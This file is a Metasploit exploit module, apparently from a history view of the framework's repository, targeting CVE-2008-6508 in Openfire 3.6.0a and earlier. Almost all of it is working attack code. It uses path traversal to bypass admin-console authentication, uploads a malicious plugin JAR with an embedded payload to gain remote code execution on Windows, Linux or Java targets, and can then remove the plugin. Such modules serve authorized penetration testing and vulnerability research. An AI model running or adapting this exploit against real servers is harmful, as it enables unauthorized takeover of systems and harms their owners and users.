metasploit-framework/modules/exploits/multi/http/openfire_auth_bypass.rb

212 lines
5.9 KiB
Ruby
Raw Normal View History

##
require 'msf/core'
require 'rex/zip'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
2012-06-27 21:15:40 +00:00
HttpFingerprint = { :pattern => [ /(Jetty)/ ] }
2012-06-27 21:15:40 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Openfire Admin Console Authentication Bypass',
'Description' => %q{
This module exploits an authentication bypass vulnerability in the administration
2012-06-27 21:15:40 +00:00
console of Openfire servers. By using this vulnerability it is possible to
upload/execute a malicious Openfire plugin on the server and execute arbitrary Java
code. This module has been tested against Openfire 3.6.0a.
It is possible to remove the uploaded plugin after execution, however this might turn
2012-06-27 21:15:40 +00:00
the server in some kind of unstable state, making re-exploitation difficult. You might
want to do this manually.
},
2012-06-27 21:15:40 +00:00
'Author' =>
[
'Andreas Kurtz', # Vulnerability discovery
'h0ng10', # Metasploit module
],
'License' => MSF_LICENSE,
2012-06-27 21:15:40 +00:00
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2008-6508' ],
2012-06-27 21:15:40 +00:00
[ 'OSVDB', '49663' ],
[ 'BID', '32189' ],
2012-06-27 21:15:40 +00:00
[ 'EDB', '7075' ],
[ 'URL', 'http://community.igniterealtime.org/thread/35874' ]
],
'DisclosureDate' => 'Nov 10 2008',
'Privileged' => true,
'Platform' => ['java', 'win', 'linux' ], # Others ?
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
#
# Java version
#
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
}
],
#
2012-06-27 21:15:40 +00:00
# Platform specific targets
#
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
]
],
'DefaultTarget' => 0,
))
register_options(
[
Opt::RPORT(9090),
2012-06-27 21:15:40 +00:00
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]),
OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]),
OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]),
OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]),
], self.class)
end
def check
2012-06-27 21:15:40 +00:00
base = target_uri.path
base << '/' if base[-1, 1] != '/'
path = "#{base}login.jsp"
res = send_request_cgi(
{
'uri' => path
2012-06-27 21:38:52 +00:00
})
if (not res) or (res.code != 200)
print_error("Failed: Error requesting #{path}")
return nil
end
2012-06-27 21:15:40 +00:00
versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/
if versioncheck.nil? then
print_error("Unable to detect Openfire version")
return Exploit::CheckCode::Unknown
end
print_status("Detected version: #{$1}.#{$2}.#{$3}")
2012-06-27 21:15:40 +00:00
version = "#{$1}#{$2}#{$3}".to_i
2012-06-27 21:15:40 +00:00
return Exploit::CheckCode::Safe if version > 360
# Just to be sure, try to access the log page
2012-06-27 21:15:40 +00:00
path = "#{base}setup/setup-/../../log.jsp"
res = send_request_cgi(
{
'uri' => path
2012-06-27 21:38:52 +00:00
})
if (not res) or (res.code != 200)
print_error("Failed: Error requesting #{path}")
2012-06-27 21:15:40 +00:00
return Exploit::CheckCode::Unknown
end
2012-06-27 21:15:40 +00:00
Exploit::CheckCode::Vulnerable
end
def get_plugin_jar(plugin_name)
files = [
[ "logo_large.gif" ],
[ "logo_small.gif" ],
[ "readme.html" ],
[ "changelog.html" ],
[ "lib", "plugin-metasploit.jar" ]
]
jar = Rex::Zip::Jar.new
jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508"))
2012-06-27 21:15:40 +00:00
plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8))
plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8))
plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() }
plugin_xml.gsub!(/PLUGINNAME/, plugin_name)
plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc)
plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author)
jar.add_file("plugin.xml", plugin_xml)
jar
end
def exploit
2012-06-27 21:15:40 +00:00
base = target_uri.path
base << '/' if base[-1, 1] != '/'
plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8))
plugin = get_plugin_jar(plugin_name)
arch = target.arch
plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
2012-06-27 21:38:52 +00:00
if (p = exploit_regenerate_payload(plat, arch)) == nil
print_error("Failed to regenerate payload")
return
end
plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
plugin.build_manifest
# Upload the plugin to the server
print_status("Uploading plugin #{plugin_name} to the server")
boundary = rand_text_alphanumeric(6)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; "
data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
data << plugin.pack
data << "\r\n--#{boundary}--"
res = send_request_cgi({
2012-06-27 21:15:40 +00:00
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
}
2012-06-27 21:38:52 +00:00
})
print_error("Warning: got no response from the upload, continuing...") if !res
# Delete the uploaded JAR file
2012-06-27 21:15:40 +00:00
if datastore['REMOVE_PLUGIN'] then
print_status("Deleting plugin #{plugin_name} from the server")
res = send_request_cgi({
2012-06-27 21:15:40 +00:00
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
'headers' =>
{
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
}
2012-06-27 21:15:40 +00:00
})
if not res
print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")
end
end
end
end